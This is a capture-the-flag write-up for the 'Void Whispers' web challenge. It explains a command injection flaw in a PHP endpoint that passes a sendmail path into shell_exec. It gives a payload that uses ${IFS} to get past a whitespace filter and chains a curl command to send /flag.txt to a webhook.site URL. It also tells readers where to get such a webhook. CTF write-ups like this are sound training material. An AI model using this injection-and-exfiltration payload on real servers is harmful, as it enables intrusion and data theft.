Void Whispers

OVERVIEW

So Download the given files from the site and open the instance and Let’s check it out

Hmm The Site allows as to send mail through sendmail Path which looks kinda suspicious

Let’s check the downloaded files to see any vulnerability there

We Found It !!

The updateSetting endpoint ( challenge/controllers/IndexController.php) reads a user-controlled sendMailPath POST parameter and blindly interpolates it into a shell_exec("which $sendMailPath") call.

Because the application executes a shell command with unsanitized input, this results in command injection vulnerability. The developer attempted to block spaces with preg_match('/\s/') but this is insufficient — attackers can use ${IFS} to inject whitespace and shell metacharacters (e.g. ;) to chain commands.

So we will use this payload:

/usr/sbin/sendmail;curl${IFS}<WEBHOOK-UNIQUE-URL>?flag=$(cat${IFS}/flag.txt)

Now Let me tell you what is webhook and where u can get your own unique URL:

A webhook is simply an HTTP endpoint that accepts incoming requests (GET/POST/etc.) so one system can notify or send data to another.

And webhook.site is a public online tool that generates a unique temporary URL for you. When someone (or something) makes an HTTP request to that URL, webhook.site records and displays the full request so you can inspect it.

To Obtain Your Unique URL go visit this site: https://webhook.site (No need of sign up)

Now you also can use ngrock as an alternative to webhook site

So Now Lets Enter Our Payload in the Sendmail PATH parameter.

So this payload /usr/sbin/sendmail;curl${IFS}https://webhook.site/<id>?flag=$(cat${IFS}/flag.txt) will cause the server to run curl and exfiltrate /flag.txt to my webhook.

Let’s Send this and see what we get